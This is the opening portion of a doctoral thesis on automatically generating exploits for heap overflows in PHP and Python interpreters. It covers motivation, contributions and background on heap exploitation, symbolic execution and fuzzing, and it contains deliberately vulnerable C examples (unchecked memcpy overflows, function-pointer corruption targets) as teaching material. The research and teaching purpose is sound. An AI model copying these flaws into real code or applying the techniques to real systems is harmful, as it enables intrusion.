Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters

Sean Heelan
Balliol College
University of Oxford

A thesis submitted for the degree of Doctor of Philosophy

Hilary 2020

Acknowledgements

First and foremost, I would like to thank my supervisors, Prof. Tom Melham and Prof. Daniel Kroening, for their invaluable support and assistance during my research. I am grateful for the guidance they provided, but also for the freedom they gave me to pursue my scientific interests. I would like to thank my colleagues in the research group for their insights and discussions over the past few years, especially John Galea, Martin Nyx Brain and Youcheng Sun. I am also thankful to Prof. Kasper Rasmussen, Prof. Cas Cremers and Prof. Alex Rogers who took part in my various internal examinations. I am indebted to Thomas Dullien for hours of discussion on the topic of exploit generation and, equally importantly, for never needing much convincing to go surfing. The papers I have written during my DPhil have benefited from reviews and input from a number of people, both inside and outside of academia. I am eternally grateful to the anonymous reviewers from the USENIX Security, ACM CCS, and IEEE S&P conferences, as well as Dave Aitel, Bas Alberts, Rodrigo Branco, and Mara Tam, for their detailed feedback and assistance in improving my work. On a personal note, I would like to thank my parents, John and Bernadette, for their continued support, without which I wouldn’t have even started a DPhil, let alone finished one. To the good friends I made during my time in Oxford, and in particular Rolf, Emma, Dan, Anna, Sara and Roman, I would like to say thank you for the conversations, dinners, late nights, early mornings, and everything else that made my time here memorable. Finally, I would like to thank the Department of Computer Science in Oxford, as well as Balliol College, for hosting me over the past few years and providing an intellectually stimulating and enjoyable environment.

Abstract

This dissertation addresses the problem of automatic exploit generation for heap-based buffer overflows in language interpreters. Language interpreters are ubiquitous within modern software, embedded in everything from web browsers, to anti-virus engines, to cloud computing platforms, and, within interpreters, heap-based buffer overflows are a common source of vulnerability. Automatic exploit generation for such vulnerabilities is a largely open problem. In the past decade, greybox methods that combine large scale input generation with feedback from instrumentation have proven themselves to be the most successful approach to detecting many types of software vulnerabilities. Despite this, prior to the start of my research they had not been a significant component of exploit generation systems. Greybox approaches are attractive as they tend to scale far better than whitebox approaches when applied to large software. However, end-to-end exploit generation is too complex and multi-faceted a task to approach with a single greybox solution. During my research I have analysed the exploit generation problem for heap-based overflows in language interpreters in order to break it down into a set of logical sub-problems that can be addressed with separate greybox solutions. In this dissertation I present these sub-problems, greybox algorithms for each, and demonstrate how the solutions for the sub-problems can be combined to generate an exploit. The most significant of the sub-problems that I address is the heap layout problem, for which I provide a detailed analysis, two different greybox solutions, and methods for integrating solutions to this problem into both manual and automatic exploit generation. The presented algorithms form the first approach to automatic exploit generation for heap overflows in interpreters. They also provide the first approach to exploit generation in any class of program that integrates a solution for automatic heap layout manipulation.
At the core of the approach is a novel method for discovering exploit primitives—inputs to the target program that result in a sensitive operation, such as a function call or a memory write, using attacker-injected data. To produce an exploit primitive from a heap overflow vulnerability, one has to discover a target data structure to corrupt, ensure an instance of that data structure is adjacent to the source of the overflow on the heap, and ensure that the post-overflow corrupted data is used in a manner desired by the attacker. I present solutions to address these three tasks in an automatic, greybox, and modular manner.

Contents

List of Abbreviations

1 Introduction
  1.1 Motivation
  1.2 Problem Definition
  1.3 Contributions

2 Background
  2.1 General Background Material
    2.1.1 Exploitation of Heap-based Overflows
    2.1.2 Symbolic Execution and Language Interpreters
    2.1.3 Greybox Program Analysis
  2.2 Literature Review
    2.2.1 AEG for Stack-Based Overflows
    2.2.2 AEG for Heap-based Overflows
    2.2.3 Assisting Exploit Development and Payload Generation
    2.2.4 Data-Only Attacks
    2.2.5 Theory of Exploitation
    2.2.6 Manual Exploit Development

3 A Greybox Approach to the Heap Layout Problem
  3.1 Introduction
    3.1.1 An Example
  3.2 Heap Allocator Mechanisms
    3.2.1 Relevant Allocator Policies and Mechanisms
    3.2.2 Allocators
  3.3 The Heap Layout Manipulation Problem in Deterministic Settings
    3.3.1 Problem Restrictions for a Deterministic Setting
    3.3.2 Heap Layout Manipulation Primitives
    3.3.3 Challenges
  3.4 Automatic Heap Layout Manipulation
    3.4.1 SIEVE: An Evaluation Framework for HLM Algorithms


    3.4.2 SHRIKE: A HLM System for PHP
  3.5 Experiments and Evaluation
    3.5.1 Synthetic Benchmarks
    3.5.2 PHP-Based Benchmarks
    3.5.3 Generating a Control-Flow Hijacking Exploit for PHP
    3.5.4 Research Questions
    3.5.5 Generalisability
    3.5.6 Threats to Validity

4 A Genetic Algorithm for the Heap Layout Problem
  4.1 Introduction
  4.2 Genetic Algorithm
    4.2.1 Target-Agnostic Operation
    4.2.2 Individual Representation
    4.2.3 Population Initialisation
    4.2.4 Genetic Operators
    4.2.5 Evaluation and Fitness
    4.2.6 Selection
    4.2.7 Implementation
  4.3 Experiments
    4.3.1 Research Questions
  4.4 Analysis and Discussion
    4.4.1 The Success Rate of EvoHeap on Synthetic Benchmarks
    4.4.2 The Success Rate of EvoHeap on PHP Benchmarks
    4.4.3 The Speed of EvoHeap on Synthetic Benchmarks
    4.4.4 The Speed of EvoHeap on PHP Benchmarks
    4.4.5 Answers to Research Questions

5 A Greybox Approach to Automatic Exploit Generation
  5.1 Introduction
    5.1.1 Model, Assumptions and Practical Applicability
  5.2 System Overview and Motivating Example
  5.3 Primitive Discovery
    5.3.1 Vulnerability Importing
    5.3.2 Test Preprocessing
    5.3.3 New Input Generation
    5.3.4 Heap Layout Exploration
    5.3.5 Primitive Categorisation and Dynamically Discovering I/O Relationships
  5.4 Exploit Generation

    5.4.1 Primitive Transformers
  5.5 Solving the Heap Layout Problem
    5.5.1 Automatic Injection of SHRIKE Directives
  5.6 Exploit Generation Walk-through
  5.7 Evaluation
    5.7.1 Implementation
    5.7.2 Exploitation
  5.8 Assisted Exploit Generation
  5.9 Generalisability and Threats to Validity

6 Conclusion
  6.1 Future Work
    6.1.1 Greybox AEG
    6.1.2 Heap Layout Manipulation
    6.1.3 General AEG

Appendices

References

List of Abbreviations

AEG    Automatic Exploit Generation
CFI    Control-Flow Integrity
GA     Genetic Algorithm
HLP    Heap Layout Problem
HLM    Heap Layout Manipulation
KLoC   Kilo-Lines of Code
LoC    Lines of Code
OOB    Out Of Bounds
ROP    Return-Oriented Programming

Failure is central to engineering. Every single calculation that an engineer makes is a failure calculation. Successful engineering is all about understanding how things break or fail. — Henry Petroski

1 Introduction

1.1 Motivation

The phrase “Software is Eating the World” refers to the phenomenon by which many of the most successful companies across diverse industries are now essentially software companies [1]. Whether in entertainment, finance, retail, marketing, communications, or a host of other areas, software provides the core value of a significant number of the world’s companies. And, while software eats the world, bugs and vulnerabilities are eating software. There is by now a long list of famous software bugs that have caused death, destruction, disruption and massive financial loss. To point out just a few incidents:

1. June 3rd 1985, a software flaw causes a Therac-25 radiation therapy machine to deliver a massive dose of radiation to a patient, severely injuring them. The same flaw would later cause the deaths of three other patients, and injure others [2].
2. February 25th 1991, an arithmetic error causes an American Patriot Missile battery to fail to track and destroy an incoming missile, resulting in the deaths of 28 American soldiers [3, 4].
3. June 4th 1996, the first Ariane 5 rocket explodes shortly after launch due to an error in its representation of floating point numbers [5].
4. August 14th 2003, a race condition causes an error monitoring system to malfunction, eventually resulting in a power blackout to 55 million people across the American Northeast [6].


5. August 1st 2012, Knight Capital loses $461m, and is driven nearly to bankruptcy, when an automatic trading system makes millions of erroneous trades [7, 8].

Thankfully, software flaws resulting in death and destruction of the above sort are rare. However, consumer and enterprise software is riddled with similar bugs that consistently and continuously lead to security incidents. In this dissertation, it is bugs of that sort that we concern ourselves with. Such bugs are plentiful and, every day, they are used and abused by criminals, law enforcement agencies, hacktivists, intelligence services, and the inconveniently curious, to gain access to computer systems. One of the earliest, and most famous, large scale network security incidents occurred in 1988. On November 2nd, Robert Morris launched a worm that leveraged flaws in multiple programs to spread. The worm, which would become known as the Morris Worm, would bring down 10% of the Internet in 24 hours [9, 10]. In the years since, diverse groups and individuals have studied the capabilities that software vulnerabilities provide to attackers, and crafted techniques for leveraging them to compromise systems and networks. Exploit development, the part-art and part-science process of turning software bugs into reliable exploits, is now a critical process in the activities of intelligence services, militaries, law enforcement agencies and organised crime. For obvious reasons, much of this activity is not intentionally made public by the protagonists. However, we have some insight into the area due to a mixture of whistle-blower activity, operational errors and analysis by security companies. In 2013, Edward Snowden leaked a massive trove of documents relating to the espionage activities of the U.S.A. and its Five Eyes partners1. These documents showed large scale and on-going efforts to find and exploit vulnerabilities in essentially every category of software used by individuals, enterprises and governments, e.g. web browsers, PDF viewers, telecommunications software, operating systems and networking software.
The Five Eyes are not unique in their dedication to software exploitation. Other major powers, such as China and Russia, also invest heavily in the area, as evidenced by numerous reports documenting their attempts, and successes, at penetrating networks across the globe [11]. The ability to construct exploits for modern targets is not limited to the most prominent world powers and large defence contractors though. Smaller nations have demonstrated an interest and capability in the area [12, 13], and several boutique security firms offer sophisticated exploits for sale [14, 15]. Beyond that,

1 The United Kingdom, Canada, New Zealand and Australia.

small teams of independent researchers, and individuals, regularly demonstrate the ability to construct exploits against the most widely used operating systems and user software [16]. Despite the apparent free-for-all in software exploitation, the construction of reliable exploits is becoming more difficult. Advances in operating systems, hardware and compiler technology have meant that a single exploit often now needs to use multiple bugs to achieve its goal. For example, to achieve native code execution in a web browser, an exploit may need to first defeat Address Space Layout Randomisation (ASLR), then use a buffer overflow to hijack an instruction pointer, all to get code execution within a sandboxed process. From there, to escape the sandbox it will need another bug, or multiple bugs, in either a privileged broker process or the underlying operating system. Such bug chains are now common, and longer chains are not unheard of, e.g. researchers recently demonstrated a chain of seven bugs to compromise an Android device [17]. Developing exploits of this nature can take months and requires experts. Many exploit developers specialise in particular targets, for example writing exploits only for web browsers running on Windows, or perhaps even specialising to a single web browser. This dissertation is motivated by the largely manual nature of real-world exploit development, and my belief that there are significant efficiency gains to be found in the near-future through automation. Compared to vulnerability discovery, the processes involved in exploit writing, and their automation, are under-studied. Thus, while we have a large body of knowledge on automatic bug finding, including best practices, easy-to-deploy and open-source solutions, and on-going releases providing continuous improvements, in exploit generation far less exploratory research has been done, let alone codification of such research into best practices and tools.
A question sometimes asked when it comes to automatic exploit generation research is "Why work on something that primarily helps cyber criminals or other bad actors?". This is a question worth addressing, as I believe it is based on faulty premises and potentially dissuades researchers from investigating problems that would have a net social good if addressed. My first retort is that exploits serve purposes beyond espionage and criminality. An exploit provides a ‘ground truth’ for the severity of a vulnerability. If an exploit can be produced then it is not necessary to speculate about exploitability. This information is useful in both the prioritisation of producing fixes by software developers, and the application of those fixes by consumers and enterprises. My second retort is that, whether one likes it or not, research into automatic exploit generation is taking place in private by government agencies and militaries2. As with all other areas in which machine automation is potentially applicable, successful research in this area has the potential to significantly move the needle in terms of the capabilities of those with access to it. General-purpose automatic exploit generation isn’t likely to happen any time soon, but in the next few years we are going to see ever-increasing partial automation, and perhaps full automation against particular bug classes in particular targets. Depending on the type of automation, and how significantly it augments the capabilities of human analysts, this may mean an ability to generate exploits at a much higher rate than is possible today, against harder targets, or using bugs currently thought to not be practically exploitable. If this is feasible, then it is imperative that developers know about it and can take appropriate action, e.g. by increasing the urgency with which they use and develop safer programming languages, hardware safety features, and operating system and compiler safety mechanisms.
Thus, the choice is not between “Do AEG research or do not”; it is between “Know the state of the art in AEG or stick our collective heads in the sand”. My hope is that this dissertation is a small step towards avoiding the latter outcome, and encourages others to do the same.

1.2 Problem Definition

The problem that I address in this work is the automatic generation of exploits for heap overflow vulnerabilities in language interpreters. My hypothesis is that greybox methods can be used to construct a pipeline that takes as input a vulnerability trigger3 for a heap overflow and produces as output an exploit. For the purposes of this work, an exploit is an input to the program that hijacks the instruction pointer and redirects execution to a ‘gadget’ that launches a ‘/bin/sh’ shell. The details of this are explained in Chapter 5. As with all current work on exploit generation, I make a number of assumptions about the target system and the type of vulnerabilities to be used in order to make the problem sufficiently tractable to allow for advancing the state-of-the-art. The assumptions are explained and justified in Chapters 3, 4 and 5. However, I mention them here as they are important for providing context on my contributions. The assumptions are as follows:

2 And, for all we know, by motivated non-state groups, e.g. criminals.
3 A ‘vulnerability trigger’ is a concrete input to the target software that triggers a vulnerability. For example, an input that causes a heap overflow to occur.

• A break for Address Space Layout Randomisation (ASLR) is available, or there is no ASLR on the target system.
• Control-Flow Integrity protection mechanisms are not enabled on the target software.
• The heap allocator used by the target software is deterministic in its internal operations.
• The attacker can determine the state of the heap allocator at the point where they begin interacting with the target software, or reset it to a known state.
• The heap overflow provides sufficient control over a sufficient number of contiguous bytes in memory so as to allow for the redirection of a pointer to an address of the attacker's choosing.

1.3 Contributions

During my research I have analysed the exploit generation problem for heap-based overflows in language interpreters in order to break it down into a set of logical sub-problems that can be addressed with separate greybox solutions. In this dissertation I present these sub-problems, greybox algorithms for each, and demonstrate how the solutions for the sub-problems can be combined to generate an exploit. The most significant of the sub-problems that I address is the heap layout problem, for which I provide a detailed analysis, two different greybox solutions, and methods for integrating solutions to this problem into both manual and automatic exploit generation. In more detail, this dissertation provides:

1. An architecture for a purely greybox approach to exploit generation using heap overflows. Previous exploit generation systems predominantly rely on symbolic execution and whitebox methods. Instead, my approach is built on extracting information from existing tests, lightweight instrumentation, and fuzzing. To enable this approach, I have broken down the exploit generation task into several sub-tasks and developed a greybox solution for each. These sub-tasks include:

(a) Determining how to interact with an allocator via the language accepted by an interpreter.
(b) Determining how to allocate potentially useful objects on the heap via the language accepted by an interpreter.
(c) Solving heap layout manipulation problems.
(d) Constructing exploitation primitives from heap overflow vulnerabilities.

(e) Light-weight taint tracking in the context of an interpreter.
(f) The construction of an exploit, given solutions for the above tasks.

The implementation is called Gollum and can generate exploits for the Python and PHP language interpreters.

2. A definition and analysis of the heap layout manipulation problem as a standalone task within the context of automatic exploit generation.

3. A random search algorithm and a genetic algorithm for solving heap layout manipulation problems, and an evaluation of both approaches on real-world allocators.

4. The concept of lazy resolution of tasks during exploit generation, where a task can be assumed to be resolved in order to explore the options a solution would provide, and later solved if the solution would prove useful. Concretely, in the context of exploit generation for heap overflows, I constructed a custom heap allocator that allows one to request a particular heap layout, which can then be explored in order to determine if it is useful for exploit generation or not. If it is, the search can then begin for an input that produces the useful layout. This avoids the wasted effort that would result if one first has to search for the input required to produce a particular layout and only then could check if it was useful or not.

5. The concept of exploit templates, which allow the automatic heap layout manipulation system to be integrated both into the automatic exploit generation system, Gollum, and into manual exploit generation as an assistant. A template is simply an exploit with mark-up that indicates heap layout problems that need to be solved. Such templates can be manually constructed by an exploit developer, allowing them to off-load the time-consuming task of solving heap layout problems to the automated engine. They can also be constructed by Gollum, allowing it to leverage the heap layout manipulation engines during automatic exploit generation.

In the beginning there was nothing, which exploded. — Terry Pratchett, Lords and Ladies

2 Background

In this chapter I first provide general background information related to the problems and solutions later addressed in Chapters 3, 4, and 5, followed by a detailed literature review of relevant prior work.

2.1 General Background Material

2.1.1 Exploitation of Heap-based Overflows

In languages that are not memory-safe, such as C and C++, out-of-bounds (OOB) memory accesses are a common issue. OOB memory accesses can occur due to a variety of vulnerability types, but the most straightforward is a linear buffer overflow, in which a series of contiguous bytes before or after a memory buffer are accessed. For example, due to a memcpy in which the length argument is larger than the size of the destination buffer. From an OOB write, an attacker will have different exploitation options available depending on where the buffer resides. The two most common locations are the stack and the heap. For a variety of reasons, prior to 2017, stack-based buffer overflows received the majority of the attention from AEG researchers. However, in many target applications, heap-based overflows are as common a bug class, if not more so, and their exploitation involves a number of unique challenges. The do_overflow function in Listing 2.1 takes a pointer as its first argument, and then writes the bytes indicated by its second and third arguments to that location. Depending on whether it is called from to_stack or to_heap it will result


void do_overflow(char *p, char *s, int x) {
    memcpy(p, s, x);
}

void to_stack(char *s, int x) {
    char buf[128];
    do_overflow(buf, s, x);
}

void to_heap(char *s, int x) {
    void *buf = malloc(128);
    do_overflow(buf, s, x);
}

void dispatch(int use_stack, char *s, int x) {
    if (use_stack) {
        to_stack(s, x);
    } else {
        to_heap(s, x);
    }
}

Listing 2.1: A program containing both a stack-based overflow and a heap-based overflow.

in either a stack-based overflow or a heap-based overflow. The attacker can choose which is called via the dispatch function, which is the interface to the program. Let us first consider the case where the first argument to dispatch is true, and the stack-based overflow is triggered. Figure 2.1 shows the program’s stack before and after the overflow occurs at the memcpy. The x86 calling convention specifies that a call instruction places the return address on the stack. Therefore, if the number of bytes copied into the stack-based buffer is sufficiently large, the return address to be used when to_stack returns to dispatch will be corrupted by the overflow. This scenario is shown on the right-hand side of Figure 2.1, where a series of ‘A’ characters have filled the buffer buf, and then corrupted the stored base pointer and return address for the to_stack function. On the x86 architecture the stack is used to store function-local variables as well as meta-data such as return addresses and frame pointers. Thus, what is available to corrupt at the point where the overflow occurs depends on the functions that have been called on the way to the vulnerable function. The most straightforward exploitation strategy is to corrupt a stored return address and redirect it to point to a location

[Figure 2.1 diagram: the stack frames of dispatch, to_stack, and do_overflow, before and after the overflow; afterwards, buf and the saved base pointer and return address of to_stack are filled with ‘A’ bytes.]

Figure 2.1: Representation of the program’s stack before and after the memcpy overflow, assuming a 32-bit x86 architecture. Function arguments are highlighted in green, meta-data in red, and local variables in orange.

containing code that the attacker wishes to execute1. When the function returns via a ret instruction the corrupted return address will be read from the stack and placed into the instruction pointer register. If, instead, the first argument to dispatch is false we end up with a very different exploitation scenario. The to_heap function dynamically allocates a buffer via malloc, and this ends up as the destination buffer used in the memcpy overflow. So, what will be corrupted when the overflow occurs? The answer is “it depends”. A program’s heap memory is under the control of an algorithm called a heap allocator, or simply an allocator. For programs written in C, the ANSI C standard [18] specifies the interface to be provided by an allocator, but puts no restrictions on how that allocator internally manages memory or positions buffers. Thus, the data located after the heap-allocated buffer could be more heap-allocated application data, allocator meta-data, or simply unmapped memory. Furthermore, the location at which a buffer is placed depends on the logical layout of memory held by the allocator at that point in time. This layout depends on the allocations and deallocations that have taken place previously, and so an attacker can often have a significant degree of influence over what gets corrupted by the overflow by manipulating the heap layout prior to causing the allocation of the source buffer for the overflow.

1 In reality, this process is usually complicated by protection mechanisms such as stack canaries and ASLR.

typedef struct DataOnly {
    char name[128];
} DataOnly;

typedef struct DataPtr {
    int size;
    char *data;
} DataPtr;

typedef struct FuncPtr {
    void* (*func)();
} FuncPtr;

Listing 2.2: Type definitions for heap-based data-structures to corrupt.

[Figure 2.2 diagram: layouts A, B and C, in each of which the overflow source buffer is immediately followed by an instance of DataOnly, DataPtr, or FuncPtr respectively.]

Figure 2.2: Three different possible heap layouts for the overflow in Listing 2.1, corrupting the three different data-types from Listing 2.2. The buffer representing the overflow source is in green, with the corrupted buffer in orange.

Listing 2.2 provides type definitions for three structures: one which contains data only, one which contains a data pointer, and one which contains a function pointer. Assume these structures can be allocated on the heap by the program from Listing 2.1. When the overflow occurs an instance of any of these structures could be corrupted. Let us consider three different possible heap layouts, shown in Figure 2.2, and assume that the overflow only corrupts the buffer placed immediately after the source buffer. In the first layout, labelled ‘A’, an instance of DataOnly is

corrupted. Assuming the name field is simply user data, the program’s stability will not be affected and, unless some security-relevant decision is made based on the contents of this buffer, the overflow will not assist with exploitation2. In the second layout, labelled ‘B’, an instance of DataPtr is corrupted. The overflow gives the attacker control over the size and data fields. As the data field is a pointer, if it is later used in a read or a write operation then it is possible it could be used in an exploit to leak sensitive data, or to corrupt some other location of the attacker’s choosing. Corrupting just the size field may also be useful to the attacker as it may allow them to read or write data that is placed immediately before or after the location that the existing pointer in data points to. Finally, in the layout labelled ‘C’, an instance of FuncPtr is corrupted. In this case the overflow may be used to change where the function pointer points to, which in turn will lead to the control-flow of the application being hijacked if the pointer is later called. From this example, we can see how the heap layout provides another ‘degree of freedom’ to be considered by the exploit developer. This offers both opportunities and challenges. A significant opportunity is that the heap is often rich with instances of data structures that are useful in constructing an exploit. Both application data and meta-data used by the allocator offer interesting corruption targets. With this opportunity comes the challenge of having to figure out how to actually achieve the desired layout reliably. A target application will not offer an API that directly allows for heap layout manipulation, and the heap allocator will not allow the attacker to simply request a particular layout.
If the heap is not in the correct layout once the overflow occurs then the application will most likely crash, either at the point of the overflow if an unmapped memory page is hit, or later when corrupted heap meta-data or application data is used. Much of this dissertation focuses on addressing this challenge, in order to automatically discover and achieve heap layouts that are useful for exploitation. What makes one heap layout, and the corruption of a particular object, useful or not, depends on the outcome the attacker is trying to achieve. There are many ways for an exploit developer to use heap data corruption, and they may be specific to the operating system that they are attacking, the application, or even the context in which that application is being used. In this dissertation I focus on producing an input that hijacks the control-flow of the target application, with the goal of launching an external command, e.g. a ‘/bin/sh’ shell. In Chapter 5 I explain two ways of doing this, and how they can be achieved. One method applies to the corruption of function pointers, and the other to the corruption of data pointers.

2 Although, even in this case there may be a useful outcome available to the attacker. For example, if the content is intended to be terminated with a null byte then replacing this null byte with something else may lead to an information leak.

2.1.2 Symbolic Execution and Language Interpreters

Symbolic execution [19] is a program analysis technique in which logical formulas representing the semantics of one or more paths through a program are built, and then conjoined with another formula representing a condition that the user wishes to check. The resulting formula is checked with a SAT or SMT solver, and the result allows one to draw conclusions about the original program. There are many variants of symbolic execution and it has been used successfully for a variety of tasks, including bug finding [20], equivalence checking [21] and verification [22]. Symbolic execution has also been used as a major component, and often the only component, of all major exploit generation projects prior to 2017. However, perhaps surprisingly, it does not play a role in the analysis systems that I have constructed as part of this research. While there have been several research projects showing applications of symbolic execution to the analysis of interpreted languages, the application of symbolic execution to the analysis of language interpreters themselves remains an open problem. Language interpreters provide a ‘perfect storm’ of problems for symbolic execution. For bug finding, and in previous exploit generation research, symbolic execution has typically been used on command line utilities and file parsing libraries. These types of programs have two key attributes that make them amenable to symbolic execution. Firstly, they are often relatively small, and secondly there tends to be a direct data-flow relationship between input values and the values used in conditional statements. The advantage of small programs is relatively obvious; a 10KLoC command line utility that converts images from one form to another will most likely have a smaller state space than a language interpreter like PHP, which not only includes a lexer, parser and virtual machine for the PHP language, but also comes with libraries for image parsing, XML processing, network connectivity, and so on. 
The second property has perhaps a less obvious impact on the success of symbolic execution, but is significant in determining whether a program will be amenable to traditional symbolic execution or not. To understand why it is important we must consider how symbolic execution engines explore programs. Symbolic execution engines operate by iterating over the instructions that form a path, and executing per-instruction handlers to update the symbolic state based on the semantics of each instruction. At branches, the state is checked to see if the variables that impact the branch are symbolic or not. If they are, then a state is forked for each side of the branch and exploration continues down both paths. If, however, the variables impacting a branch are not symbolic then the engine simply concretely

 1 int counter = 0;
 2
 3 void foo_or_bar(int x) {
 4   if (x == 10) {
 5     foo();
 6   } else {
 7     bar();
 8   }
 9 }
10
11 void interface_direct(int action, int arg) {
12   if (action == 1) {
13     foo_or_bar(arg);
14   }
15 }
16
17 void interface_indirect(int action) {
18   if (action == 1) {
19     foo_or_bar(counter);
20   } else if (action == 2) {
21     counter += 1;
22   } else if (action == 3) {
23     counter -= 1;
24   }
25 }

Listing 2.3: A program with two interfaces, one of which allows direct control over the argument to foo_or_bar and one which does not.

evaluates the condition and follows whatever path is implied. So, in order for the symbolic execution engine to explore a particular code region the branches in that region must be based on symbolic data. Symbolic execution engines tend to be good at propagating symbolic information where there is a direct dataflow dependency from one variable to another. For example, if the variable a is symbolic and the code b = a + 10 is executed then it is easy to imagine how one might write the handlers for addition and assignment to ensure that the engine ends up with a correct representation for the symbolic value of b: retrieve the value of the variable a, check if it is symbolic, if so set the variable b equal to an expression representing a + 10, if not concretely evaluate a + 10 and set b equal to the result. On the other hand, indirect dataflow dependencies are much harder to detect and reason about. Consider the code in Listing 2.3. Assume a user can interact with the program via the interface_direct or interface_indirect functions and that the goal is to discover an input that causes foo to be executed. In the case of the interface_direct function a symbolic execution engine will easily solve the problem. Assume action and arg are symbolic. At line 12 the engine will fork two states, one for action == 1 and one for its negation. Continuing with the first state it will then enter foo_or_bar and fork another pair of states, one for x == 10 and another for its negation. Again continuing with the first state the engine will reach the call to foo and query its solver for assignments to action and arg that satisfy the path condition. The solver will return the values 1 and 10, and the problem is solved. Now consider the interface_indirect function. In this case, action is symbolic and so states will be forked to explore the paths reaching lines 19, 21 and 23.
On the latter two, the counter variable will be incremented or decremented but it will remain concrete as its value is not directly based on any symbolic value. On the path reaching line 19 the foo_or_bar function is called with the counter variable. This is concrete, and so on line 4 a new state will not be forked as the condition can be concretely evaluated to false, unless of course interface_indirect has been called the requisite number of times to increment counter to 10. The key point is that the symbolic execution engine has no way to reason about the indirect influence that the user input has over the counter variable. Instead, it has to hope that it eventually stumbles across a path that has the correct concrete value. This is clearly much less efficient than the case of direct data-flow dependencies, where at a branch a state can just be forked and the solver queried for a satisfying assignment. In complex software it is highly likely that the analysis engine will not stumble across the correct concrete values to get around branches that are indirectly influenced, and thus significant amounts of code will not be explored. Language interpreters are a category of software where branches that are under indirect influence are common. For example, branches may be based on object properties, such as the length of strings and lists, the presence of an object in a map or a set, or parent-child relationships between objects. Symbolic execution engines tend to miss all of these relationships and thus are not capable of exploring the code that is behind such branches. The above challenges mean that in this work I have avoided the use of symbolic execution, despite its common appearance as the core reasoning engine in previous work on exploit generation. As I will discuss in Chapter 6, this doesn’t mean that there are no applications for symbolic execution in exploit generation for language interpreters; there certainly are.
It does mean though that I hypothesised that other methods would better form the core of a solution, with symbolic execution perhaps providing focused solutions to particular problems. Focusing exclusively on greybox methods also allows us to push them as far as we can, without relying on symbolic execution as a crutch that we would later pay for in terms of scalability.
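The per-instruction handler behaviour described earlier for b = a + 10 can be sketched as follows. This is a minimal illustration, not taken from any particular engine; the types and names are invented, and a real engine would build an expression tree rather than a fixed string:

```c
#include <stdbool.h>
#include <stddef.h>

/* A symbolic value is either a concrete integer or a reference to an
 * expression over the symbolic inputs. */
typedef struct {
    bool symbolic;
    long concrete;      /* valid when !symbolic */
    const char *expr;   /* valid when symbolic, e.g. "(+ a 10)" */
} SymVal;

/* Handler for 'b = a + k': propagate symbolic information when the
 * operand is symbolic, otherwise take the concrete fast path. */
SymVal handle_add_const(SymVal a, long k) {
    SymVal b;
    if (a.symbolic) {
        b.symbolic = true;
        b.expr = "(+ a 10)";   /* illustrative: a fresh AST node in reality */
        b.concrete = 0;
    } else {
        b.symbolic = false;
        b.concrete = a.concrete + k;
        b.expr = NULL;
    }
    return b;
}
```

At a branch, the engine applies the same check: if the condition's operands are symbolic it forks states and queries the solver; if they are concrete, as with counter in Listing 2.3, it simply follows the implied path.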

2.1.3 Greybox Program Analysis

Whitebox program analysis techniques are those where the analyser has access to and processes each instruction along the paths that it wishes to derive information about. Examples include abstract interpretation [23], symbolic execution and traditional static dataflow analysis [24]. At the other end of the spectrum, blackbox program analysis techniques treat the program to be analysed as an opaque entity, the behaviour of which is divined by sending it inputs and observing the outputs. In the world of bug hunting, fuzzing [25] is the canonical example of a blackbox analysis approach. Both approaches have strengths and weaknesses. Whitebox techniques can reason precisely about the semantics of paths, at the cost of being difficult to scale. Blackbox techniques can be trivial to scale and implement, at the cost of being inefficient and failing to provide any guarantees about safety or security of the analysed software. With that said, many modern implementations do not sit neatly into either of these categories. In particular, for fuzzing there has been a move away from purely blackbox approaches towards systems that use lightweight instrumentation to derive more fine-grained insights into the target software’s behaviour as it processes test cases. For example, the AFL [26] fuzzer, unarguably one of the most successful vulnerability hunting tools available, injects code into the target program to record the branches taken by a given input. This information can then be used to iteratively generate inputs that cover more and more of the target’s paths. These new approaches, combining input generation with instrumentation, are referred to as greybox analyses. Alongside feedback-driven approaches to input generation, a second enabler of the success of modern fuzzers has been the adoption of a multitude of techniques for rewriting, or restructuring, the original software to make it more amenable to fuzzing. 
The type of instrumentation that AFL does to inject code to record branches is arguably within this category, but more invasive approaches are common. For example, with libfuzzer [27] one writes a test harness that wraps functions in the API of the program to test. It then handles the fuzzing of that API in a highly efficient manner. There are also automated approaches, such as compiler passes that break comparisons of multi-byte constants and strings down into a sequence of nested comparisons of single bytes [28–30]. The motivation for such rewriting is that a fuzzer has a higher chance of guessing an 8-bit value correctly than a 32-bit value, or multi-character string. If it does guess such a value then it will be able to detect the new code coverage that results, and can thus incrementally find long constant values that would be near-impossible to guess correctly otherwise. Fuzzers using this approach can thus generate inputs to satisfy conditions like if (x == 0x18329123), which is the type of example often given for the necessity of whitebox techniques. The final component upon which the success of modern fuzzing rests is sanitizers [31]. Sanitizers are typically implemented as compilation passes that modify the source program so that bugs, such as buffer overflows, are detected at the point where they occur rather than later in the program’s execution when their effects manifest. This can dramatically increase the productivity of a fuzzer in two ways. Firstly, some vulnerabilities do not necessarily result in a crash and so it is possible to generate an input that triggers the vulnerability, but not realise it. For example, a single byte out-of-bounds write may corrupt unused data on the heap and thus not impact the behaviour of the software on the test run, while still being a potentially serious vulnerability under a different heap layout.
Secondly, it is typically far easier to do root cause analysis of a vulnerability if the erroneous condition is detected sooner, rather than later. In this work we are not focused on bug finding, and so we cannot make use of existing fuzzing systems directly. However, I do leverage a greybox approach to perform all of the necessary analysis, taking inspiration from the high level ideas that have led to the success of fuzzing for the purposes of vulnerability detection in recent years. In particular, I use existing tests as a source of information on how to generate new inputs, I use lightweight instrumentation to detect inputs that have particular properties that are not detectable in a blackbox fashion, I use a sanitizer-like approach to detect overflows, and, as it is not feasible to solve the entire problem end to end, I have developed techniques that break the overall problem down into smaller steps whose solutions can be composed into a solution for the whole.
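The comparison-splitting transformation mentioned above can be sketched as follows. The rewritten form gives a coverage-guided fuzzer four independently discoverable branches instead of one; the constant is the one from the example in the text, and the function names are illustrative:

```c
#include <stdint.h>

/* Original form: a fuzzer must guess all 32 bits at once to make
 * progress past this branch. */
int check_original(uint32_t x) {
    return x == 0x18329123;
}

/* Split form, as produced by the compiler passes described in the
 * text: each byte comparison yields new coverage when satisfied, so
 * the constant can be discovered incrementally, one byte at a time. */
int check_split(uint32_t x) {
    if ((uint8_t)(x >> 24) != 0x18) return 0;
    if ((uint8_t)(x >> 16) != 0x32) return 0;
    if ((uint8_t)(x >> 8)  != 0x91) return 0;
    if ((uint8_t)(x)       != 0x23) return 0;
    return 1;
}
```

Both functions accept exactly the same set of inputs; only the branch structure, and hence the feedback visible to the fuzzer, differs.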

2.2 Literature Review

